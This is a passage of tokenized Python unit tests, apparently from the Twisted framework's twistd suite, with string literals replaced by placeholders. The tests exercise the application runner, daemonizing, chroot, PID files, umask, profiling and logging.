<EOL> self . runner = runner <EOL> def start ( self , application ) : <EOL> """<STR_LIT>""" <EOL> self . runner . order . append ( "<STR_LIT>" ) <EOL> self . runner . hadApplicationLogObserver = hasattr ( self . runner , <EOL> '<STR_LIT>' ) <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> class TestApplicationRunner ( app . ApplicationRunner ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , options ) : <EOL> app . ApplicationRunner . __init__ ( self , options ) <EOL> self . order = [ ] <EOL> self . logger = TestLoggerFactory ( self ) <EOL> def preApplication ( self ) : <EOL> self . order . append ( "<STR_LIT>" ) <EOL> self . hadApplicationPreApplication = hasattr ( self , '<STR_LIT>' ) <EOL> def postApplication ( self ) : <EOL> self . order . append ( "<STR_LIT>" ) <EOL> self . hadApplicationPostApplication = hasattr ( self , '<STR_LIT>' ) <EOL> class ApplicationRunnerTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> config = twistd . ServerOptions ( ) <EOL> self . serviceMaker = MockServiceMaker ( ) <EOL> config . loadedPlugins = { '<STR_LIT>' : self . serviceMaker } <EOL> config . subOptions = object ( ) <EOL> config . subCommand = '<STR_LIT>' <EOL> self . config = config <EOL> def test_applicationRunnerGetsCorrectApplication ( self ) : <EOL> """<STR_LIT>""" <EOL> arunner = CrippledApplicationRunner ( self . config ) <EOL> arunner . run ( ) <EOL> self . assertIdentical ( <EOL> self . serviceMaker . options , self . config . subOptions , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertIdentical ( <EOL> self . serviceMaker . service , <EOL> service . IService ( arunner . application ) . services [ <NUM_LIT:0> ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_preAndPostApplication ( self ) : <EOL> """<STR_LIT>""" <EOL> s = TestApplicationRunner ( self . config ) <EOL> s . run ( ) <EOL> self . assertFalse ( s . hadApplicationPreApplication ) <EOL> self . assertTrue ( s . hadApplicationPostApplication ) <EOL> self . assertTrue ( s . hadApplicationLogObserver ) <EOL> self . assertEqual ( s . order , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def _applicationStartsWithConfiguredID ( self , argv , uid , gid ) : <EOL> """<STR_LIT>""" <EOL> self . config . parseOptions ( argv ) <EOL> events = [ ] <EOL> class FakeUnixApplicationRunner ( twistd . _SomeApplicationRunner ) : <EOL> def setupEnvironment ( self , chroot , rundir , nodaemon , umask , <EOL> pidfile ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def shedPrivileges ( self , euid , uid , gid ) : <EOL> events . append ( ( '<STR_LIT>' , euid , uid , gid ) ) <EOL> def startReactor ( self , reactor , oldstdout , oldstderr ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def removePID ( self , pidfile ) : <EOL> pass <EOL> @ implementer ( service . IService , service . IProcess ) <EOL> class FakeService ( object ) : <EOL> processName = None <EOL> uid = None <EOL> gid = None <EOL> def setName ( self , name ) : <EOL> pass <EOL> def setServiceParent ( self , parent ) : <EOL> pass <EOL> def disownServiceParent ( self ) : <EOL> pass <EOL> def privilegedStartService ( self ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def startService ( self ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def stopService ( self ) : <EOL> pass <EOL> application = FakeService ( ) <EOL> verifyObject ( service . IService , application ) <EOL> verifyObject ( service . IProcess , application ) <EOL> runner = FakeUnixApplicationRunner ( self . config ) <EOL> runner . preApplication ( ) <EOL> runner . application = application <EOL> runner . postApplication ( ) <EOL> self . assertEqual ( <EOL> events , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , False , uid , gid ) , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_applicationStartsWithConfiguredNumericIDs ( self ) : <EOL> """<STR_LIT>""" <EOL> uid = <NUM_LIT> <EOL> gid = <NUM_LIT> <EOL> self . _applicationStartsWithConfiguredID ( <EOL> [ "<STR_LIT>" , str ( uid ) , "<STR_LIT>" , str ( gid ) ] , uid , gid ) <EOL> test_applicationStartsWithConfiguredNumericIDs . skip = setuidSkip <EOL> def test_applicationStartsWithConfiguredNameIDs ( self ) : <EOL> """<STR_LIT>""" <EOL> user = "<STR_LIT:foo>" <EOL> uid = <NUM_LIT> <EOL> group = "<STR_LIT:bar>" <EOL> gid = <NUM_LIT> <EOL> patchUserDatabase ( self . patch , user , uid , group , gid ) <EOL> self . _applicationStartsWithConfiguredID ( <EOL> [ "<STR_LIT>" , user , "<STR_LIT>" , group ] , uid , gid ) <EOL> test_applicationStartsWithConfiguredNameIDs . skip = setuidSkip <EOL> def test_startReactorRunsTheReactor ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = DummyReactor ( ) <EOL> runner = app . ApplicationRunner ( { <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False } ) <EOL> runner . startReactor ( reactor , None , None ) <EOL> self . assertTrue ( <EOL> reactor . called , "<STR_LIT>" ) <EOL> class UnixApplicationRunnerSetupEnvironmentTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> unset = object ( ) <EOL> def setUp ( self ) : <EOL> self . root = self . unset <EOL> self . cwd = self . unset <EOL> self . mask = self . unset <EOL> self . daemon = False <EOL> self . pid = os . getpid ( ) <EOL> self . patch ( os , '<STR_LIT>' , lambda path : setattr ( self , '<STR_LIT:root>' , path ) ) <EOL> self . patch ( os , '<STR_LIT>' , lambda path : setattr ( self , '<STR_LIT>' , path ) ) <EOL> self . patch ( os , '<STR_LIT>' , lambda mask : setattr ( self , '<STR_LIT>' , mask ) ) <EOL> self . runner = UnixApplicationRunner ( twistd . ServerOptions ( ) ) <EOL> self . runner . daemonize = self . daemonize <EOL> def daemonize ( self , reactor ) : <EOL> """<STR_LIT>""" <EOL> self . daemon = True <EOL> self . patch ( os , '<STR_LIT>' , lambda : self . pid + <NUM_LIT:1> ) <EOL> def test_chroot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( "<STR_LIT>" , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertEqual ( self . root , "<STR_LIT>" ) <EOL> def test_noChroot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertIdentical ( self . root , self . unset ) <EOL> def test_changeWorkingDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT>" , True , None , None ) <EOL> self . assertEqual ( self . cwd , "<STR_LIT>" ) <EOL> def test_daemonize ( self ) : <EOL> """<STR_LIT>""" <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , None , None ) <EOL> self . assertTrue ( self . daemon ) <EOL> def test_noDaemonize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertFalse ( self . daemon ) <EOL> def test_nonDaemonPIDFile ( self ) : <EOL> """<STR_LIT>""" <EOL> pidfile = self . mktemp ( ) <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , pidfile ) <EOL> with open ( pidfile , '<STR_LIT:rb>' ) as f : <EOL> pid = int ( f . read ( ) ) <EOL> self . assertEqual ( pid , self . pid ) <EOL> def test_daemonPIDFile ( self ) : <EOL> """<STR_LIT>""" <EOL> pidfile = self . mktemp ( ) <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , None , pidfile ) <EOL> with open ( pidfile , '<STR_LIT:rb>' ) as f : <EOL> pid = int ( f . read ( ) ) <EOL> self . assertEqual ( pid , self . pid + <NUM_LIT:1> ) <EOL> def test_umask ( self ) : <EOL> """<STR_LIT>""" <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , <NUM_LIT> , None ) <EOL> self . assertEqual ( self . mask , <NUM_LIT> ) <EOL> def test_noDaemonizeNoUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertIdentical ( self . mask , self . unset ) <EOL> def test_daemonizedNoUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , None , None ) <EOL> self . assertEqual ( self . mask , <NUM_LIT> ) <EOL> class UnixApplicationRunnerStartApplicationTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def test_setupEnvironment ( self ) : <EOL> """<STR_LIT>""" <EOL> options = twistd . ServerOptions ( ) <EOL> options . parseOptions ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> application = service . Application ( "<STR_LIT>" ) <EOL> self . runner = UnixApplicationRunner ( options ) <EOL> args = [ ] <EOL> def fakeSetupEnvironment ( self , chroot , rundir , nodaemon , umask , <EOL> pidfile ) : <EOL> args . extend ( ( chroot , rundir , nodaemon , umask , pidfile ) ) <EOL> self . assertEqual ( <EOL> inspect . getargspec ( self . runner . setupEnvironment ) , <EOL> inspect . getargspec ( fakeSetupEnvironment ) ) <EOL> self . patch ( UnixApplicationRunner , '<STR_LIT>' , <EOL> fakeSetupEnvironment ) <EOL> self . patch ( UnixApplicationRunner , '<STR_LIT>' , <EOL> lambda * a , ** kw : None ) <EOL> self . patch ( app , '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> self . runner . startApplication ( application ) <EOL> self . assertEqual ( <EOL> args , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , True , <NUM_LIT> , '<STR_LIT>' ] ) <EOL> class UnixApplicationRunnerRemovePIDTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def test_removePID ( self ) : <EOL> """<STR_LIT>""" <EOL> runner = UnixApplicationRunner ( { } ) <EOL> path = self . mktemp ( ) <EOL> os . makedirs ( path ) <EOL> pidfile = os . path . join ( path , "<STR_LIT>" ) <EOL> open ( pidfile , "<STR_LIT:w>" ) . close ( ) <EOL> runner . removePID ( pidfile ) <EOL> self . assertFalse ( os . path . exists ( pidfile ) ) <EOL> def test_removePIDErrors ( self ) : <EOL> """<STR_LIT>""" <EOL> runner = UnixApplicationRunner ( { } ) <EOL> runner . removePID ( "<STR_LIT>" ) <EOL> errors = self . flushLoggedErrors ( OSError ) <EOL> self . assertEqual ( len ( errors ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( errors [ <NUM_LIT:0> ] . value . errno , errno . ENOENT ) <EOL> class FakeNonDaemonizingReactor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _beforeDaemonizeCalled = False <EOL> self . _afterDaemonizeCalled = False <EOL> def beforeDaemonize ( self ) : <EOL> self . _beforeDaemonizeCalled = True <EOL> def afterDaemonize ( self ) : <EOL> self . _afterDaemonizeCalled = True <EOL> def addSystemEventTrigger ( self , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> @ implementer ( IReactorDaemonize ) <EOL> class FakeDaemonizingReactor ( FakeNonDaemonizingReactor ) : <EOL> """<STR_LIT>""" <EOL> class DummyReactor ( object ) : <EOL> """<STR_LIT>""" <EOL> called = False <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . called : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . called = True <EOL> class AppProfilingTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_profile ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> with open ( config [ "<STR_LIT>" ] ) as f : <EOL> data = f . read ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> if profile is None : <EOL> test_profile . skip = "<STR_LIT>" <EOL> def _testStats ( self , statsClass , profile ) : <EOL> out = NativeStringIO ( ) <EOL> stdout = self . patch ( sys , '<STR_LIT>' , out ) <EOL> stats = statsClass ( profile ) <EOL> stats . print_stats ( ) <EOL> stdout . restore ( ) <EOL> data = out . getvalue ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> def test_profileSaveStats ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> config [ "<STR_LIT>" ] = True <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> self . _testStats ( pstats . Stats , config [ '<STR_LIT>' ] ) <EOL> if profile is None : <EOL> test_profileSaveStats . skip = "<STR_LIT>" <EOL> def test_withoutProfile ( self ) : <EOL> """<STR_LIT>""" <EOL> savedModules = sys . modules . copy ( ) <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> sys . modules [ "<STR_LIT>" ] = None <EOL> try : <EOL> self . assertRaises ( SystemExit , profiler . run , None ) <EOL> finally : <EOL> sys . modules . clear ( ) <EOL> sys . modules . update ( savedModules ) <EOL> def test_profilePrintStatsError ( self ) : <EOL> """<STR_LIT>""" <EOL> class ErroneousProfile ( profile . Profile ) : <EOL> def print_stats ( self ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . patch ( profile , "<STR_LIT>" , ErroneousProfile ) <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> oldStdout = sys . stdout <EOL> self . assertRaises ( RuntimeError , profiler . run , reactor ) <EOL> self . assertIdentical ( sys . stdout , oldStdout ) <EOL> if profile is None : <EOL> test_profilePrintStatsError . skip = "<STR_LIT>" <EOL> def test_cProfile ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> with open ( config [ "<STR_LIT>" ] ) as f : <EOL> data = f . read ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> if cProfile is None : <EOL> test_cProfile . skip = "<STR_LIT>" <EOL> def test_cProfileSaveStats ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> config [ "<STR_LIT>" ] = True <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> self . _testStats ( pstats . Stats , config [ '<STR_LIT>' ] ) <EOL> if cProfile is None : <EOL> test_cProfileSaveStats . skip = "<STR_LIT>" <EOL> def test_withoutCProfile ( self ) : <EOL> """<STR_LIT>""" <EOL> savedModules = sys . modules . copy ( ) <EOL> sys . modules [ "<STR_LIT>" ] = None <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> try : <EOL> self . assertRaises ( SystemExit , profiler . run , None ) <EOL> finally : <EOL> sys . modules . clear ( ) <EOL> sys . modules . update ( savedModules ) <EOL> def test_unknownProfiler ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> error = self . assertRaises ( SystemExit , app . AppProfiler , config ) <EOL> self . assertEqual ( str ( error ) , "<STR_LIT>" ) <EOL> def test_defaultProfiler ( self ) : <EOL> """<STR_LIT>""" <EOL> profiler = app . AppProfiler ( { } ) <EOL> self . assertEqual ( profiler . profiler , "<STR_LIT>" ) <EOL> def test_profilerNameCaseInsentive ( self ) : <EOL> """<STR_LIT>""" <EOL> profiler = app . AppProfiler ( { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . assertEqual ( profiler . profiler , "<STR_LIT>" ) <EOL> def _patchTextFileLogObserver ( patch ) : <EOL> """<STR_LIT>""" <EOL> logFiles = [ ] <EOL> oldFileLogObserver = logger . textFileLogObserver <EOL> def observer ( logFile , * args , ** kwargs ) : <EOL> logFiles . append ( logFile ) <EOL> return oldFileLogObserver ( logFile , * args , ** kwargs ) <EOL> patch ( logger , '<STR_LIT>' , observer ) <EOL> return logFiles <EOL> def _setupSyslog ( testCase ) : <EOL> """<STR_LIT>""" <EOL> logMessages = [ ] <EOL> class fakesyslogobserver ( object ) : <EOL> def __init__ ( self , prefix ) : <EOL> logMessages . append ( prefix ) <EOL> def emit ( self , eventDict ) : <EOL> logMessages . append ( eventDict ) <EOL> testCase . patch ( syslog , "<STR_LIT>" , fakesyslogobserver ) <EOL> return logMessages <EOL> class AppLoggerTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . observers = [ ] <EOL> def beginLoggingTo ( observers ) : <EOL> for observer in observers : <EOL> self . observers . append ( observer ) <EOL> globalLogPublisher . addObserver ( observer ) <EOL> self . patch ( globalLogBeginner , '<STR_LIT>' , beginLoggingTo ) <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> for observer in self . observers : <EOL> globalLogPublisher . removeObserver ( observer ) <EOL> def _makeObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> @ implementer ( ILogObserver ) <EOL> class TestObserver ( object ) : <EOL> _logs = [ ] <EOL> def __call__ ( self , event ) : <EOL> self . _logs . append ( event ) <EOL> return TestObserver ( ) <EOL> def _checkObserver ( self , observer ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . observers , [ observer ] ) <EOL> self . assertIn ( "<STR_LIT>" , observer . _logs [ <NUM_LIT:0> ] [ "<STR_LIT>" ] ) <EOL> self . assertIn ( "<STR_LIT>" , observer . _logs [ <NUM_LIT:1> ] [ "<STR_LIT>" ] ) <EOL> def test_start ( self ) : <EOL> """<STR_LIT>""" <EOL> logger = app . AppLogger ( { } ) <EOL> observer = self . _makeObserver ( ) <EOL> logger . _getLogObserver = lambda : observer <EOL> logger . start ( Componentized ( ) ) <EOL> self . _checkObserver ( observer ) <EOL> def test_startUsesApplicationLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> application = Componentized ( ) <EOL> observer = self . _makeObserver ( ) <EOL> application . setComponent ( ILogObserver , observer ) <EOL> logger = app . AppLogger ( { } ) <EOL> logger . start ( application ) <EOL> self . _checkObserver ( observer ) <EOL> def _setupConfiguredLogger ( self , application , extraLogArgs = { } , <EOL> appLogger = app . AppLogger ) : <EOL> """<STR_LIT>""" <EOL> observer = self . _makeObserver ( ) <EOL> logArgs = { "<STR_LIT>" : lambda : observer } <EOL> logArgs . update ( extraLogArgs ) <EOL> logger = appLogger ( logArgs ) <EOL> logger . start ( application ) <EOL> return observer <EOL> def test_startUsesConfiguredLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> application = Componentized ( ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application ) ) <EOL> def test_configuredLogObserverBeatsComponent ( self ) : <EOL> """<STR_LIT>""" <EOL> observer = self . _makeObserver ( ) <EOL> application = Componentized ( ) <EOL> application . setComponent ( ILogObserver , observer ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application ) ) <EOL> self . assertEqual ( observer . _logs , [ ] ) <EOL> def test_configuredLogObserverBeatsLegacyComponent ( self ) : <EOL> """<STR_LIT>""" <EOL> nonlogs = [ ] <EOL> application = Componentized ( ) <EOL> application . setComponent ( LegacyILogObserver , nonlogs . append ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application ) ) <EOL> self . assertEqual ( nonlogs , [ ] ) <EOL> def test_loggerComponentBeatsLegacyLoggerComponent ( self ) : <EOL> """<STR_LIT>""" <EOL> nonlogs = [ ] <EOL> observer = self . _makeObserver ( ) <EOL> application = Componentized ( ) <EOL> application . setComponent ( ILogObserver , observer ) <EOL> application . setComponent ( LegacyILogObserver , nonlogs . append ) <EOL> logger = app . AppLogger ( { } ) <EOL> logger . start ( application ) <EOL> self . _checkObserver ( observer ) <EOL> self . assertEqual ( nonlogs , [ ] ) <EOL> def test_configuredLogObserverBeatsSyslog ( self ) : <EOL> """<STR_LIT>""" <EOL> logs = _setupSyslog ( self ) <EOL> application = Componentized ( ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application , <EOL> { "<STR_LIT>" : True } , <EOL> UnixAppLogger ) ) <EOL> self . assertEqual ( logs , [ ] ) <EOL> if _twistd_unix is None or syslog is None : <EOL> test_configuredLogObserverBeatsSyslog . skip = ( <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_configuredLogObserverBeatsLogfile ( self ) : <EOL> """<STR_LIT>""" <EOL> application = Componentized ( ) <EOL> path = self . mktemp ( ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application , <EOL> { "<STR_LIT>" : "<STR_LIT:path>" } ) ) <EOL> self . assertFalse ( os . path . exists ( path ) ) <EOL> def test_getLogObserverStdout ( self ) : <EOL> """<STR_LIT>""" <EOL> logger = app . AppLogger ( { "<STR_LIT>" : "<STR_LIT:->" } ) <EOL> logFiles = _patchTextFileLogObserver ( self . patch ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:0> ] , sys . stdout ) <EOL> logger = app . AppLogger ( { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:2> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:1> ] , sys . stdout ) <EOL> def test_getLogObserverFile ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchTextFileLogObserver ( self . patch ) <EOL> filename = self . mktemp ( ) <EOL> logger = app . AppLogger ( { "<STR_LIT>" : filename } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( logFiles [ <NUM_LIT:0> ] . path , <EOL> os . path . abspath ( filename ) ) <EOL> def test_stop ( self ) : <EOL> """<STR_LIT>""" <EOL> removed = [ ] <EOL> observer = object ( ) <EOL> def remove ( observer ) : <EOL> removed . append ( observer ) <EOL> self . patch ( globalLogPublisher , '<STR_LIT>' , remove ) <EOL> logger = app . AppLogger ( { } ) <EOL> logger . _observer = observer <EOL> logger . stop ( ) <EOL> self . assertEqual ( removed , [ observer ] ) <EOL> logger . stop ( ) <EOL> self . assertEqual ( removed , [ observer ] ) <EOL> self . assertIdentical ( logger . _observer , None ) <EOL> def test_legacyObservers ( self ) : <EOL> """<STR_LIT>""" <EOL> logs = [ ] <EOL> logger = app . AppLogger ( { } ) <EOL> @ implementer ( LegacyILogObserver ) <EOL> class LoggerObserver ( object ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , x ) : <EOL> """<STR_LIT>""" <EOL> logs . append ( x ) <EOL> logger . _observerFactory = lambda : LoggerObserver ( ) <EOL> logger . start ( Componentized ( ) ) <EOL> self . assertIn ( "<STR_LIT>" , textFromEventDict ( logs [ <NUM_LIT:0> ] ) ) <EOL> warnings = self . flushWarnings ( <EOL> [ self . test_legacyObservers ] ) <EOL> self . assertEqual ( len ( warnings ) , <NUM_LIT:0> ) <EOL> def test_unmarkedObserversDeprecated ( self ) : <EOL> """<STR_LIT>""" <EOL> logs = [ ] <EOL> logger = app . AppLogger ( { } ) <EOL> logger . _getLogObserver = lambda : logs . append <EOL> logger . start ( Componentized ( ) ) <EOL> self . assertIn ( "<STR_LIT>" , textFromEventDict ( logs [ <NUM_LIT:0> ] ) ) <EOL> warnings = self . flushWarnings ( <EOL> [ self . test_unmarkedObserversDeprecated ] ) <EOL> self . assertEqual ( len ( warnings ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( warnings [ <NUM_LIT:0> ] [ "<STR_LIT:message>" ] , <EOL> ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> class UnixAppLoggerTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . signals = [ ] <EOL> def fakeSignal ( sig , f ) : <EOL> self . signals . append ( ( sig , f ) ) <EOL> self . patch ( signal , "<STR_LIT>" , fakeSignal ) <EOL> def test_getLogObserverStdout ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchTextFileLogObserver ( self . patch ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT:->" , "<STR_LIT>" : True } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:0> ] , sys . stdout ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : True } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:2> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:1> ] , sys . stdout ) <EOL> def test_getLogObserverStdoutDaemon ( self ) : <EOL> """<STR_LIT>""" <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT:->" , "<STR_LIT>" : False } ) <EOL> error = self . assertRaises ( SystemExit , logger . _getLogObserver ) <EOL> self . assertEqual ( str ( error ) , "<STR_LIT>" ) <EOL> def test_getLogObserverFile ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchTextFileLogObserver ( self . patch ) <EOL> filename = self . mktemp ( ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : filename } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( logFiles [ <NUM_LIT:0> ] . path , os . path . abspath ( filename ) ) <EOL> self . assertEqual ( len ( self . signals ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . signals [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , signal . SIGUSR1 ) <EOL> d = Deferred ( ) <EOL> def rotate ( ) : <EOL> d . callback ( None ) <EOL> logFiles [ <NUM_LIT:0> ] . rotate = rotate <EOL> rotateLog = self . signals [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> rotateLog ( None , None ) <EOL> return d <EOL> def test_getLogObserverDontOverrideSignalHandler ( self ) : <EOL> """<STR_LIT>""" <EOL> def fakeGetSignal ( sig ) : <EOL> self . assertEqual ( sig , signal . SIGUSR1 ) <EOL> return object ( ) <EOL> self . patch ( signal , "<STR_LIT>" , fakeGetSignal ) <EOL> filename = self . mktemp ( ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : filename } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( self . signals , [ ] ) <EOL> def test_getLogObserverDefaultFile ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchTextFileLogObserver ( self . patch ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : False } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( logFiles [ <NUM_LIT:0> ] . path , os . path . abspath ( "<STR_LIT>" ) ) <EOL> def test_getLogObserverSyslog ( self ) : <EOL> """<STR_LIT>""" <EOL> logs = _setupSyslog ( self ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : True , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( logs , [ "<STR_LIT>" ] ) <EOL> observer ( { "<STR_LIT:a>" : "<STR_LIT:b>" } ) <EOL> self . assertEqual ( logs , [ "<STR_LIT>" , { "<STR_LIT:a>" : "<STR_LIT:b>" } ] ) 